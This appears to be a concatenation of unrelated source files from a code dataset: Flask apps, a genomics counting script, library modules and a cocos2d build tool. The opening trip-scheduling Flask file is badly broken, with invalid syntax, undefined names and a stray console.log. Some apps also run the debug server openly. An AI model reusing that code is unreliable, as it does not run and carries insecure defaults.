app=Flask(__name__)
api = Api(app)
class Trips():
def getOpenings(self):
"""Get time openings for current week"""
id=uuid.uuid4()
deadlines = []
t = datetime.datetime.now()
weekday=datetime.datetime.today().weekday()
if t.hour < 15:
deadline = datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=0, second=0)
deadlines.append(deadline)
elif t.hour<21:
deadline=datetime.datetime(year=t.year, month=t.month, day=t.day, hour=21, minute=0, second=0)
deadlinse.append(deadline)
else:
today + datetime.timedelta(days=1)
DateTimeRange =[{
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
},
{'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=6, minute=0, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=11, minute=0, second=0)
}]
for day in range(0,7) >= weekday:
for timeRange in DateTimeRange:
for deadline in deadlines:
timeOpening={
'id': id,
'requestDeadline' : nextdeadline,
'timeSelectionRange': DateTimeRange,
timeSelectionIntervalMinutes: 5
}
TimeOpening.append(timeOpening)
return (TimeOpening, 200)
def postRequest(self,tripRequest):
"""creates trip request """
tripRequest ={
"timeOpening": TimeOpening,
"mode": mode,
"selectedTimeRange": DateTimeRange}
id=uuid.uuid4()
TripRequests={}
for k in TripRequests:
if k == id:
return "TripRequest already submitted", 403
for {timeOpening, mode, DateTimeRange} in TripRequests[v]:
if timeOpening == TimeOpening:
return "Cannot create a trip request twice for the same time opening", 403
elif (timeOpening == timeOpening, mode == 'passenger') and (DateTimeRange = {
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
}):
return "Cannot be passenger in the AM and driver in the PM", 403
elif ({timeOpening[deadline] == datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=0, second=0) and (DateTimeRange =={
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=15, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=20, minute=0, second=0)
}) or ({timeOpening[deadline] == datetime.datetime(year=t.year, month=t.month, day=t.day, hour=21, minute=0, second=0) and (DateTimeRange =={
'start': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=6, minute=30, second=0),
'end': datetime.datetime(year=t.year, month=t.month, day=t.day, hour=11, minute=0, second=0)
}):
console.log ("Deadline has passed", 403)
## not sure how to identify the deadline to make sure TripRequest is being created before the deadline
else:
TripRequests={id:tripRequest}
TripRequests.append(tripRequest)
return tripRequest, 200
def putRequest(self,tripRequest):
"""the put method is used to update the details of trip request"""
"""Cannot modify a trip request after the deadlne and can only modify the time range + mode"""
parser-reqparse.RequestParser()
parser.add_argument("id")
args=parser.parse_args()
if TripRequest[id] in TripRequests:
return "That trip does not exist", 404
t=datetime.datetime.now()
if t.hour > 15 :
return 'The deadline to modify a trip for today has passed', 404
elif t.hour > 21:
return ' The deadline to modiy a trip for tomorrow AM has passed', 404
else:
tripRequest[id] = {
mode: args[mode],
selectedTimeRange: args[DateTimeRange]
}
return tripRequest, 200
def delete(self,tripRequest):
"""the delete method is used to delete a request """
global trips
trips = [trip for trip in TripRequests if trip["id"] != id]
return "{} is deleted.".format(trip), 200
def getRequests(self, TripRequests):
# return the content of the dictionary with status 200
for trips in TripRequests.items():
return (k,v), 200
def getRequest(self):
# get request ID from URL and look it up in the dictionary
# error 404 if not found
# return the TripRequest found with status 200
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| [
"noreply@github.com"
] | julie-norris.noreply@github.com |
8020cb403883467ba6b46d36b37b6b9b20ceabd1 | 902371721144a9883a6dee2897992f0389cd4d65 | /manuscript_analyses/exac_analysis/src/reformat_annots_exac.py | f1878d7aad5abc75de70ae359845965255f88853 | [
"MIT"
] | permissive | keoughkath/AlleleAnalyzer | e6242afc980da8ce9ed673c12aa3b928af35c470 | a33adc53f515fe5f00e519b703dd9abf006b2804 | refs/heads/master | 2022-02-09T17:22:21.106039 | 2022-02-01T02:24:37 | 2022-02-01T02:24:37 | 118,212,667 | 12 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,457 | py | import pandas as pd
in_dir = '/pollard/data/projects/AlleleAnalyzer_data/exac_data/exac_annotated_variants_by_chrom_parallel'
out_dir = '/pollard/home/kathleen/projects/AlleleAnalyzer/manuscript_analyses/exac_analysis/dat'

# Enzymes evaluated; the two SpCas9_VQR PAM variants are pooled into a
# single 'SpCas9_VQR' tally in the loop below.
cas_list=['SpCas9','SpCas9_VRER','SpCas9_EQR','SpCas9_VQR_1','SpCas9_VQR_2',
'StCas9','StCas9_2','SaCas9','SaCas9_KKH','nmCas9','cjCas9','cpf1']
# Per-enzyme counters: variants inside a PAM only, near a PAM only, or both.
in_dict = {}
near_dict = {}
both_dict = {}
for cas in cas_list:
    in_dict[cas] = 0
    near_dict[cas] = 0
    both_dict[cas] = 0
in_dict['SpCas9_VQR'] = 0
near_dict['SpCas9_VQR'] = 0
both_dict['SpCas9_VQR'] = 0
# NOTE(review): `global` at module scope is a no-op; total_vars is already global.
global total_vars
total_vars = 0
for chrom in list(range(1,23)) + ['X','Y']:
# for chrom in [8,22]:
    chrom=str(chrom)
    print(chrom)
    annot_variants=pd.read_hdf(f'{in_dir}/chr{chrom}_annots.h5','all').drop(columns=['chrom','pos','ref','alt']).reset_index(drop=True)
    annot_variants['id'] = annot_variants.index
    # get # of variants in chromosome annotated
    n_vars = len(annot_variants)
    total_vars += n_vars
    for cas in cas_list:
        if cas == 'SpCas9_VQR_1':
            # Pool both VQR PAM variants into the combined 'SpCas9_VQR' entry.
            in_pam=set(annot_variants.query(f'makes_{cas} or breaks_{cas} or makes_SpCas9_VQR_2 or breaks_SpCas9_VQR_2')['id'].tolist())
            near_pam=set(annot_variants.query(f'var_near_{cas} or var_near_SpCas9_VQR_2')['id'].tolist())
            both = in_pam.intersection(near_pam)
            both_dict['SpCas9_VQR'] += len(both)
            in_only = in_pam.difference(near_pam)
            in_dict['SpCas9_VQR'] += len(in_only)
            near_only = near_pam.difference(in_pam)
            near_dict['SpCas9_VQR'] += len(near_only)
        elif cas == 'SpCas9_VQR_2':
            # Already counted together with SpCas9_VQR_1 above.
            continue
        else:
            in_pam=set(annot_variants.query(f'makes_{cas} or breaks_{cas}')['id'].tolist())
            near_pam=set(annot_variants.query(f'var_near_{cas}')['id'].tolist())
            both = in_pam.intersection(near_pam)
            both_dict[cas] += len(both)
            in_only = in_pam.difference(near_pam)
            in_dict[cas] += len(in_only)
            near_only = near_pam.difference(in_pam)
            near_dict[cas] += len(near_only)
in_df = pd.DataFrame.from_dict(in_dict, orient='index')
in_df.columns = ['in_pam']
near_df = pd.DataFrame.from_dict(near_dict, orient='index')
near_df.columns = ['near_pam']
both_df = pd.DataFrame.from_dict(both_dict, orient='index')
both_df.columns = ['both']
# set up output dataframe (fractions of all annotated variants)
plot_df_out = in_df.merge(near_df,
left_index=True, right_index=True).merge(both_df, left_index=True,
right_index=True).divide(total_vars)
# save to file
plot_df_out.to_csv(f'{out_dir}/vars_near_in_df.tsv', sep='\t')
| [
"keoughkath@gmail.com"
] | keoughkath@gmail.com |
d6276e415487898851243f5c53a4f4dd06e136eb | 5485db6dd499451327934c18f2fdcd51e8076d54 | /src/py/flwr/common/__init__.py | bcda11c3db5cbfc24718881e0d4df52c076e9e62 | [
"Apache-2.0"
] | permissive | zliel/flower | 4ccfb87b232ab94afcbdf69ea83c878261ac625e | c5a4b2718bed5ec73a3838cc997c38b5ba4862e7 | refs/heads/main | 2023-02-12T03:49:14.989260 | 2021-01-08T15:50:35 | 2021-01-08T15:50:35 | 328,227,435 | 0 | 0 | Apache-2.0 | 2021-01-09T19:09:29 | 2021-01-09T19:09:28 | null | UTF-8 | Python | false | false | 1,761 | py | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Flower utilities shared between server and client."""
from .parameter import bytes_to_ndarray as bytes_to_ndarray
from .parameter import ndarray_to_bytes as ndarray_to_bytes
from .parameter import parameters_to_weights as parameters_to_weights
from .parameter import weights_to_parameters as weights_to_parameters
from .typing import Disconnect as Disconnect
from .typing import EvaluateIns as EvaluateIns
from .typing import EvaluateRes as EvaluateRes
from .typing import FitIns as FitIns
from .typing import FitRes as FitRes
from .typing import Parameters as Parameters
from .typing import ParametersRes as ParametersRes
from .typing import Reconnect as Reconnect
from .typing import Weights as Weights
# gRPC message-size cap shared by Flower clients and servers (512 MiB).
GRPC_MAX_MESSAGE_LENGTH: int = 536_870_912  # == 512 * 1024 * 1024

# Public re-export surface of flwr.common.
__all__ = [
    "bytes_to_ndarray",
    "Disconnect",
    "EvaluateIns",
    "EvaluateRes",
    "FitIns",
    "FitRes",
    "GRPC_MAX_MESSAGE_LENGTH",
    "ndarray_to_bytes",
    "Parameters",
    "parameters_to_weights",
    "ParametersRes",
    "Reconnect",
    "Weights",
    "weights_to_parameters",
]
| [
"noreply@github.com"
] | zliel.noreply@github.com |
94201870b49b0bb7c6b9c0e36a1f4c0cfcda92d2 | 8d0d664839f2f2c48e9e919d2c17bd4fae7812ac | /texts_to_self/config.py | 51a75a2fcd074fbeb8a2ed4cbcdcef88e60d3917 | [] | no_license | iMel408/texts_to_self | 15a3fc650753684cd92570cf168b3947c1fd4a41 | 5b53e9dbc0c839bb19f83262282da474c95fee9f | refs/heads/master | 2022-12-13T08:49:20.099017 | 2019-07-07T14:27:34 | 2019-07-07T14:27:34 | 186,907,626 | 1 | 0 | null | 2022-12-08T05:10:31 | 2019-05-15T21:51:37 | Python | UTF-8 | Python | false | false | 470 | py | import configparser
# Load all runtime settings from the INI file; values are exposed as
# module-level constants for `from config import ...` style use.
config = configparser.ConfigParser()
config.read('texts_to_self/env.cfg')

# NOTE: a stray `os.environ['SECRET_KEY'],` expression was removed here —
# `os` was never imported, so that line raised NameError on import.
SECRET_KEY = config['flask']['secret']
TWILIO_ACCOUNT_SID = config['twilio_api']['sid']
TWILIO_AUTH_TOKEN = config['twilio_api']['token']
FROM_PHONE = config['phones']['twilio']
ADMIN_PHONE = config['phones']['admin']
USERNAME = config['login']['username']
PASSWORD = config['login']['password']
# Normalize: drop any trailing slash so callers can append paths safely.
BASE_URL = config['server']['url'].rstrip('/')
| [
"melissascampini@gmail.com"
] | melissascampini@gmail.com |
cd05b9c66b95fe844a81ef8918fdebfd11c81376 | b86fae199d0d1eb62be6edc8c56c0dae2b0077a9 | /PythonTutorials/flask_app.py | 19dc5e0b705916373d31914d39fdd2315d7a32e1 | [] | no_license | Tudi/TempStorage | 5657fae8876c055d85f535636a18763676bfac9b | 1fcf4df2fdda1ebf34c818a1df0d777e4cc9a864 | refs/heads/master | 2023-07-23T12:47:34.292055 | 2023-07-17T11:24:49 | 2023-07-17T11:24:49 | 55,682,824 | 10 | 5 | null | 2022-12-07T17:50:27 | 2016-04-07T09:42:49 | C | UTF-8 | Python | false | false | 1,961 | py | import datetime
from flask import Flask, request, render_template
from peewee import Model, CharField, DateField, SqliteDatabase
app = Flask(__name__)
app.config['DEBUG'] = True
app.config["Environment"] = "Development"
@app.route('/index')
def Hello_world():
    # Simple liveness endpoint. NOTE(review): name violates snake_case but is
    # kept — Flask uses the function name as the endpoint id (url_for).
    return "Hello world"
@app.route('/test/<int:first_number>/<int:second_number>')
def Hello_world2(first_number=0, second_number=0):
    # Echo two path parameters; the int: converter 404s non-numeric segments.
    return f"Hello world. Got numbers {first_number} {second_number}"
@app.route('/<first_number>/<second_number>')
def Hello_world3(first_number=0, second_number=0):
    # Echo two untyped path segments (strings) plus the raw query-string args.
    return f" Got numbers {first_number} {second_number}, {request.args}"
dbTVShows = SqliteDatabase('TVShows.db')
class TVShow(Model):
    """Peewee model for one TV show row stored in TVShows.db."""

    class Meta:
        database = dbTVShows

    name = CharField()
    # Pass the callable (not its result) so the default is evaluated per row
    # at insert time; `today()` at class scope would freeze the date the
    # module was first imported into every later row.
    year_start = DateField(default=datetime.date.today, null=True)
    year_end = DateField(default=datetime.date.today, null=True)
def create_tables():
    # Open the SQLite connection and create the TVShow table via peewee.
    dbTVShows.connect()
    dbTVShows.create_tables([TVShow])
def drop_tables():
    # Drop the TVShow table (and its data) from TVShows.db.
    dbTVShows.drop_tables([TVShow])
def AddNewTVSEntry(TVShowName):
    """Persist a new TVShow row with the given name and return its primary key."""
    show = TVShow(name=TVShowName)
    show.save()
    return show.get_id()
@app.route('/tv-show/<int:tv_show_id>')
def tv_show_details(tv_show_id):
    """Plain-text details for one TV show; reports missing ids inline."""
    lines = [f"TV show {tv_show_id}"]
    try:
        show = TVShow().get_by_id(tv_show_id)
        lines.append("Name of the show : " + show.name)
    except TVShow.DoesNotExist as ex:
        lines.append("This id has no show assigned to it. Err : " + str(ex))
    return "<br>".join(lines)
@app.route('/tvshow/<int:tv_show_id>')
def tv_show_details_templated(tv_show_id):
    """Render the TV-show detail template, or a plain error string for unknown ids."""
    try:
        tv_show = TVShow().get_by_id(tv_show_id)
        return render_template("tv_show_template.html", tv_show=tv_show)
    except TVShow.DoesNotExist:
        # No row for this id.  (The original also had an unreachable
        # `return ""` after this try/except and an unused `as ex` binding;
        # both removed.)
        return "Id does not exist"
# Script tail -- note there is no __main__ guard, so all of this also runs on
# import.
create_tables()  # NOTE(review): will fail on a second run if the table already exists -- confirm
AddNewTVSEntry("MyShow")  # inserts a fresh "MyShow" row on every start
app.run()
| [
"jozsab1@gmail.com"
] | jozsab1@gmail.com |
415beba6c61cf7ecef07ef791a319764562c8b6f | 0b64701dbf438a868d936a47996ec01575519fe5 | /WHOISinfo/venv/lib/python3.8/site-packages/simpleurllib3.py | d700a032ac8c4e41a3c0b429d0a71d29894840ad | [] | no_license | mhNi00/APIprograms | 1f1d27064827f33052e153981a8d982f6ed73d2c | 23809d29770c3c8eae2d654a73d2b9d468bc9972 | refs/heads/main | 2023-05-15T03:02:02.508012 | 2021-06-08T18:19:01 | 2021-06-08T18:19:01 | 359,907,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,404 | py | """
Easy to use urllib3 simplifier.
Usage:
```
>>> client = simpleurllib3.Client()
>>> resp = client.get('http://httpbin.org/ip')
>>> resp.status
200
>>> resp.data
"{'origin': '127.0.0.1'}"
```
"""
import warnings
import pkg_resources
import urllib3
import certifi
import luddite
class OutdatedModuleWarning(ImportWarning):
    """
    ImportWarning class for outdated modules.

    Raised via warnings.warn() when an installed dependency is older than the
    latest release on PyPI.
    """
def _outdated_warn(module_name: str, *extra_msg):
    """Emit an OutdatedModuleWarning for *module_name*.

    An optional first extra argument is appended to the warning text after a
    comma; any further extras are ignored.
    """
    text = f'Module "{module_name}" outdated'
    if extra_msg:
        text = f"{text}, {extra_msg[0]}"
    warnings.warn(text, OutdatedModuleWarning)
def _get_package_version(package_name: str):
    """Return the version string of the locally installed *package_name*."""
    distribution = pkg_resources.get_distribution(package_name)
    return distribution.version
# Show OutdatedModuleWarning once per module rather than suppressing it.
warnings.simplefilter("module", category=OutdatedModuleWarning)
# NOTE(review): luddite queries PyPI over the network at import time -- confirm
# this is acceptable (imports fail-slow or raise offline).
if luddite.get_version_pypi('urllib3') != _get_package_version('urllib3'):
    _outdated_warn("urllib3")
class SSLClient:
    """PoolManager client that verifies server certificates via certifi.

    Every verb method returns a urllib3.response.HTTPResponse; see the
    urllib3 documentation for details.
    """
    if luddite.get_version_pypi('certifi') != _get_package_version('certifi'):
        _outdated_warn("certifi", "SSL might not work properly")
    ssl_poolmanager = urllib3.PoolManager(
        cert_reqs='CERT_REQUIRED',
        ca_certs=certifi.where()
    )
    def _url_request(self, method, url, fields, headers):
        # Shared dispatch for verbs whose fields are encoded into the URL.
        return self.ssl_poolmanager.request_encode_url(method, url, fields=fields, headers=headers)
    def _body_request(self, method, url, fields, headers):
        # Shared dispatch for verbs whose fields are encoded into the body.
        return self.ssl_poolmanager.request_encode_body(method, url, fields=fields, headers=headers)
    def get(self, url, fields=None, headers=None):
        """Issue a GET; returns urllib3.response.HTTPResponse."""
        return self._url_request("GET", url, fields, headers)
    def post(self, url, fields=None, headers=None):
        """Issue a POST; returns urllib3.response.HTTPResponse."""
        return self._body_request("POST", url, fields, headers)
    def put(self, url, fields=None, headers=None):
        """Issue a PUT; returns urllib3.response.HTTPResponse."""
        return self._body_request("PUT", url, fields, headers)
    def delete(self, url, fields=None, headers=None):
        """Issue a DELETE; returns urllib3.response.HTTPResponse."""
        return self._url_request("DELETE", url, fields, headers)
    def patch(self, url, fields=None, headers=None):
        """Issue a PATCH; returns urllib3.response.HTTPResponse."""
        return self._body_request("PATCH", url, fields, headers)
    def head(self, url, fields=None, headers=None):
        """Issue a HEAD; returns urllib3.response.HTTPResponse."""
        return self._url_request("HEAD", url, fields, headers)
    def options(self, url, fields=None, headers=None):
        """Issue an OPTIONS; returns urllib3.response.HTTPResponse."""
        return self._url_request("OPTIONS", url, fields, headers)
class Client:
    """Plain (non-verifying) PoolManager client.

    Every verb method returns a urllib3.response.HTTPResponse; see the
    urllib3 documentation for details.
    """
    poolmanager = urllib3.PoolManager()
    def _url_request(self, method, url, fields, headers):
        # Shared dispatch for verbs whose fields are encoded into the URL.
        return self.poolmanager.request_encode_url(method, url, fields=fields, headers=headers)
    def _body_request(self, method, url, fields, headers):
        # Shared dispatch for verbs whose fields are encoded into the body.
        return self.poolmanager.request_encode_body(method, url, fields=fields, headers=headers)
    def get(self, url, fields=None, headers=None):
        """Issue a GET; returns urllib3.response.HTTPResponse."""
        return self._url_request("GET", url, fields, headers)
    def post(self, url, fields=None, headers=None):
        """Issue a POST; returns urllib3.response.HTTPResponse."""
        return self._body_request("POST", url, fields, headers)
    def put(self, url, fields=None, headers=None):
        """Issue a PUT; returns urllib3.response.HTTPResponse."""
        return self._body_request("PUT", url, fields, headers)
    def delete(self, url, fields=None, headers=None):
        """Issue a DELETE; returns urllib3.response.HTTPResponse."""
        return self._url_request("DELETE", url, fields, headers)
    def patch(self, url, fields=None, headers=None):
        """Issue a PATCH; returns urllib3.response.HTTPResponse."""
        return self._body_request("PATCH", url, fields, headers)
    def head(self, url, fields=None, headers=None):
        """Issue a HEAD; returns urllib3.response.HTTPResponse."""
        return self._url_request("HEAD", url, fields, headers)
    def options(self, url, fields=None, headers=None):
        """Issue an OPTIONS; returns urllib3.response.HTTPResponse."""
        return self._url_request("OPTIONS", url, fields, headers)
| [
"michalnawarecki@wp.pl"
] | michalnawarecki@wp.pl |
12fed0bc773dcdc74c7354af413d3ba82c78af68 | 8015e3ba1cbc677b499bf9c4c4910189800ce3bf | /python/arithmetic-operators/main.py | cd902d62758fadaff60f837cdae7a9db50529c31 | [] | no_license | wanariffoo/coding-practice | 48db6a2ae7b0df5d525db596ff9f279deb7aa958 | 5689e4b3be58918d9b41a9f05e24797a5f15de0f | refs/heads/master | 2020-09-01T13:30:26.724563 | 2020-08-02T22:58:05 | 2020-08-02T22:58:05 | 218,968,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | # https://www.hackerrank.com/challenges/python-arithmetic-operators/problem
if __name__ == '__main__':
a = int(input())
b = int(input())
print('{0} \n{1} \n{2}'.format((a + b), (a - b), (a * b))) | [
"wanarif_foo@hotmail.com"
] | wanarif_foo@hotmail.com |
34215bb3f33e0ccc1fb0937cbb976722eb8b69d8 | f88dc05250d7bb954c9ae28aed55b1df4fe6241d | /NotiManagerAdmin/cocos2d/tools/gen-prebuilt/gen_prebuilt_libs.py | d8d3e06119e5517250300b7581fafe568e35e384 | [] | no_license | RoughHands/NotiManagerClient | 73c73e18d16b3fa18b0b3a7c4f136e0d89d48904 | 6d3716d6746c6b0454d601950a4636ed499974f6 | refs/heads/master | 2021-01-18T11:00:05.037575 | 2015-10-11T06:12:04 | 2015-10-11T06:12:04 | 23,171,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,486 | py | #!/usr/bin/python
# ----------------------------------------------------------------------------
# generate the prebuilt libs of engine
#
# Copyright 2014 (C) zhangbin
#
# License: MIT
# ----------------------------------------------------------------------------
'''
Generate the prebuilt libs of engine
'''
import os
import subprocess
import shutil
import sys
import excopy
import json
from argparse import ArgumentParser
if sys.platform == 'win32':
import _winreg
# Paths inside a generated runtime project, relative to the project root.
ANDROID_SO_PATH = "frameworks/runtime-src/proj.android/libs"
ANDROID_A_PATH = "frameworks/runtime-src/proj.android/obj/local"
MK_PATH = "frameworks/runtime-src/proj.android/jni/Application.mk"
# Location of the cocos console tool inside the engine checkout.
CONSOLE_PATH = "tools/cocos2d-console/bin"
def os_is_win32():
    """Return True when this interpreter runs on Windows."""
    current_platform = sys.platform
    return current_platform == 'win32'
def os_is_mac():
    """Return True when this interpreter runs on macOS."""
    current_platform = sys.platform
    return current_platform == 'darwin'
def run_shell(cmd, cwd=None):
    """Run *cmd* through the shell, raising CalledProcessError on failure.

    Returns the (zero) exit code on success.
    """
    process = subprocess.Popen(cmd, shell=True, cwd=cwd)
    process.wait()
    code = process.returncode
    if code:
        raise subprocess.CalledProcessError(returncode=code, cmd=cmd)
    return code
class Generator(object):
    """Drives the prebuilt-library builds (Android .a, Win32 .lib, iOS/Mac .a)
    for the cocos2d engine, using project/target lists read from
    build_config.json next to this script.

    NOTE(review): this is Python 2 era code (`_winreg`, `os.environ.has_key`).
    """
    # xcodebuild template: project path, target name, extra SDK args, output dir.
    XCODE_CMD_FMT = "xcodebuild -project \"%s\" -configuration Release -target \"%s\" %s CONFIGURATION_BUILD_DIR=%s"
    CONFIG_FILE = "build_config.json"
    # JSON keys used in build_config.json.
    KEY_XCODE_PROJ_INFO = "xcode_proj_info"
    KEY_WIN32_PROJ_INFO = "win32_proj_info"
    KEY_OUTPUT_DIR = "outputdir"
    KEY_TARGETS = "targets"
    def __init__(self, args):
        """Capture the parsed command-line flags and load the JSON config."""
        self.need_clean = args.need_clean
        self.enable_strip = args.enable_strip
        self.use_incredibuild = args.use_incredibuild
        self.tool_dir = os.path.realpath(os.path.dirname(__file__))
        self.no_android = args.no_android
        # Engine checkout root is two directory levels above this tool.
        self.engine_dir = os.path.join(self.tool_dir, os.path.pardir, os.path.pardir)
        self.load_config()
    def load_config(self):
        """Read build_config.json into the xcode/win32 project-info maps."""
        cfg_json = os.path.join(self.tool_dir, Generator.CONFIG_FILE)
        f = open(cfg_json)
        cfg_info = json.load(f)
        f.close()
        self.xcode_proj_info = cfg_info[Generator.KEY_XCODE_PROJ_INFO]
        self.win32_proj_info = cfg_info[Generator.KEY_WIN32_PROJ_INFO]
    def modify_mk(self, mk_file):
        """Append the armeabi/armeabi-v7a ABI list to an Application.mk."""
        if os.path.isfile(mk_file):
            file_obj = open(mk_file, "a")
            file_obj.write("\nAPP_ABI :=armeabi armeabi-v7a\n")
            file_obj.close()
    def build_android(self):
        """Create a throwaway runtime project, build its Android static libs,
        copy the .a files into prebuilt/android, optionally strip them, then
        delete the temporary project."""
        # build .so for android
        language = "lua"
        console_dir = os.path.join(self.engine_dir, CONSOLE_PATH)
        cmd_path = os.path.join(console_dir, "cocos")
        proj_name = "My%sGame" % language
        proj_path = os.path.join(self.engine_dir, proj_name)
        if os.path.exists(proj_path):
            shutil.rmtree(proj_path)
        # create a runtime project
        create_cmd = "%s new -l %s -t runtime -d %s %s" % (cmd_path, language, self.engine_dir, proj_name)
        run_shell(create_cmd)
        # Add multi ABI in Application.mk
        mk_file = os.path.join(proj_path, MK_PATH)
        self.modify_mk(mk_file)
        # build it
        build_cmd = "%s compile -s %s -p android --ndk-mode release -j 4" % (cmd_path, proj_path)
        run_shell(build_cmd)
        # copy .a to prebuilt dir
        obj_dir = os.path.join(proj_path, ANDROID_A_PATH)
        prebuilt_dir = os.path.join(self.tool_dir, "prebuilt", "android")
        copy_cfg = {
            "from": obj_dir,
            "to": prebuilt_dir,
            "include": [
                "*.a$"
            ]
        }
        excopy.copy_files_with_config(copy_cfg, obj_dir, prebuilt_dir)
        if self.enable_strip:
            # strip the android libs
            ndk_root = os.environ["NDK_ROOT"]
            if os_is_win32():
                if self.is_32bit_windows():
                    bit_str = "x86"
                else:
                    bit_str = "x86_64"
                sys_folder_name = "windows-%s" % bit_str
            elif os_is_mac():
                sys_folder_name = "darwin-x86_64"
            # NOTE(review): on Linux sys_folder_name is never assigned and the
            # next line would raise NameError -- confirm Linux is unsupported here.
            strip_cmd_path = os.path.join(ndk_root, "toolchains/arm-linux-androideabi-4.8/prebuilt/%s/arm-linux-androideabi/bin/strip" % sys_folder_name)
            if os.path.exists(strip_cmd_path):
                strip_cmd = "%s -S %s/armeabi*/*.a" % (strip_cmd_path, prebuilt_dir)
                run_shell(strip_cmd)
        # remove the project
        shutil.rmtree(proj_path)
    def get_required_vs_version(self, proj_file):
        """Map the '# Visual Studio 20xx' tag in a .sln file to a VS version
        string ('11.0' for 2012, '12.0' for 2013); None when unrecognised."""
        # get the VS version required by the project
        import re
        file_obj = open(proj_file)
        pattern = re.compile(r"^# Visual Studio.+(\d{4})")
        num = None
        for line in file_obj:
            match = pattern.match(line)
            if match is not None:
                num = match.group(1)
                break
        if num is not None:
            if num == "2012":
                ret = "11.0"
            elif num == "2013":
                ret = "12.0"
            else:
                ret = None
        else:
            ret = None
        return ret
    def get_vs_cmd_path(self, require_version):
        """Locate a devenv of at least *require_version* via the registry.

        Returns (needUpgrade, devenv_path); needUpgrade is True when only a
        newer VS than required was found (the .sln must then be upgraded).
        """
        # find the VS in register, if system is 64bit, should find vs in both 32bit & 64bit register
        if self.is_32bit_windows():
            reg_flag_list = [ _winreg.KEY_WOW64_32KEY ]
        else:
            reg_flag_list = [ _winreg.KEY_WOW64_64KEY, _winreg.KEY_WOW64_32KEY ]
        needUpgrade = False
        vsPath = None
        try:
            for reg_flag in reg_flag_list:
                print("find vs in reg : %s" % ("32bit" if reg_flag == _winreg.KEY_WOW64_32KEY else "64bit"))
                vs = _winreg.OpenKey(
                    _winreg.HKEY_LOCAL_MACHINE,
                    r"SOFTWARE\Microsoft\VisualStudio",
                    0,
                    _winreg.KEY_READ | reg_flag
                )
                try:
                    i = 0
                    while True:
                        try:
                            # enum the keys in vs reg
                            version = _winreg.EnumKey(vs, i)
                            find_ver = float(version)
                            # find the vs which version >= required version
                            if find_ver >= float(require_version):
                                key = _winreg.OpenKey(vs, r"SxS\VS7")
                                vsPath, type = _winreg.QueryValueEx(key, version)
                                if os.path.exists(vsPath):
                                    if float(version) > float(require_version):
                                        needUpgrade = True
                                    break
                                else:
                                    vsPath = None
                        except:
                            # non-numeric key or missing value: try the next index
                            continue
                        finally:
                            i += 1
                except:
                    # EnumKey exhausted all subkeys
                    pass
                # if find one right vs, break
                if vsPath is not None:
                    break
        except WindowsError as e:
            message = "Visual Studio wasn't installed"
            print(e)
            raise Exception(message)
        commandPath = os.path.join(vsPath, "Common7", "IDE", "devenv")
        return (needUpgrade, commandPath)
    def is_32bit_windows(self):
        """True when the host Windows OS is 32-bit (x86 and not under WOW64)."""
        arch = os.environ['PROCESSOR_ARCHITECTURE'].lower()
        archw = os.environ.has_key("PROCESSOR_ARCHITEW6432")
        return (arch == "x86" and not archw)
    def build_win32_proj(self, cmd_path, sln_path, proj_name, mode):
        """Invoke devenv on a single project of a solution (*mode* is
        'build' or 'rebuild')."""
        build_cmd = " ".join([
            "\"%s\"" % cmd_path,
            "\"%s\"" % sln_path,
            "/%s \"Release|Win32\"" % mode,
            "/Project \"%s\"" % proj_name
        ])
        run_shell(build_cmd)
    def build_win32(self):
        """Build every configured Win32 solution/target and copy the resulting
        .lib files into the tool's prebuilt output directory."""
        print("Building Win32")
        for key in self.win32_proj_info.keys():
            output_dir = self.win32_proj_info[key][Generator.KEY_OUTPUT_DIR]
            proj_path = os.path.join(self.engine_dir, key)
            require_vs_version = self.get_required_vs_version(proj_path)
            needUpgrade, vs_command = self.get_vs_cmd_path(require_vs_version)
            # get the build folder & win32 output folder
            build_folder_path = os.path.join(os.path.dirname(proj_path), "Release.win32")
            if os.path.exists(build_folder_path):
                shutil.rmtree(build_folder_path)
            os.makedirs(build_folder_path)
            win32_output_dir = os.path.join(self.tool_dir, output_dir)
            if os.path.exists(win32_output_dir):
                shutil.rmtree(win32_output_dir)
            os.makedirs(win32_output_dir)
            # upgrade projects
            if needUpgrade:
                commandUpgrade = ' '.join([
                    "\"%s\"" % vs_command,
                    "\"%s\"" % proj_path,
                    "/Upgrade"
                ])
                run_shell(commandUpgrade)
            if self.use_incredibuild:
                # use incredibuild, build whole sln
                build_cmd = " ".join([
                    "BuildConsole",
                    "%s" % proj_path,
                    "/build",
                    "/cfg=\"Release|Win32\""
                ])
                run_shell(build_cmd)
            if not self.use_incredibuild:
                # build the projects
                for proj_name in self.win32_proj_info[key][Generator.KEY_TARGETS]:
                    self.build_win32_proj(vs_command, proj_path, proj_name, "build")
                    lib_file_path = os.path.join(build_folder_path, "%s.lib" % proj_name)
                    if not os.path.exists(lib_file_path):
                        # if the lib is not generated, rebuild the project
                        self.build_win32_proj(vs_command, proj_path, proj_name, "rebuild")
                    if not os.path.exists(lib_file_path):
                        raise Exception("Library %s not generated as expected!" % lib_file_path)
            # copy the libs into prebuilt dir
            for file_name in os.listdir(build_folder_path):
                file_path = os.path.join(build_folder_path, file_name)
                shutil.copy(file_path, win32_output_dir)
